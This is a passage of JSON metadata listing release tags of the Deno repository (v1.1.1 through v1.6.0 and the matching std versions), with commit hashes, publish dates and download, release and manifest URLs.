1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.